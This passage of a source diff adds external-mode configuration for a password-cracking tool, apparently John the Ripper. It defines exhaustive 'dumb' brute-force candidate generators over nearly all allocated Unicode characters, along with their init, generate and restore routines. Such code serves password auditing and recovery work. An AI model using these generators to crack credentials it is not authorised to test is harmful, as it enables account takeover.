+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+	/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
@@ -0,0 +1,2368 @@
+# This  software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Generic implementation of "dumb" exhaustive search of FULL Unicode.
+# Default is to try *all* allocated characters in Unicode v11 (there's
+# 137,046 of them). Even if a fast format can exhaust two characters in one
+# hour, three characters would take 12 years...
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 12 bytes each).
+#
+# Also note that for UTF-16 formats, the resulting plaintext size within the
+# format will be up to four bytes (two 16-bit words) due to use of surrogates
+# for characters above U+FFFF. This means a format which normally handles up
+# to 27 characters may be limited to only 13 characters, worst case.
+[List.External:Dumb32]
+int maxlength;            // Maximum password length to try
+int last;                 // Last character position, zero-based
+int lastid;               // Character index in the last position
+int id[0x7f];             // Current character indices for other positions
+int charset[0x22000], c0; // Characters
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 2;
+
+	# UTF-8 representation is up to 4x the character length
+	if (maxlength * 4 > cipher_limit)
+		maxlength = (cipher_limit + 3) / 4;
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
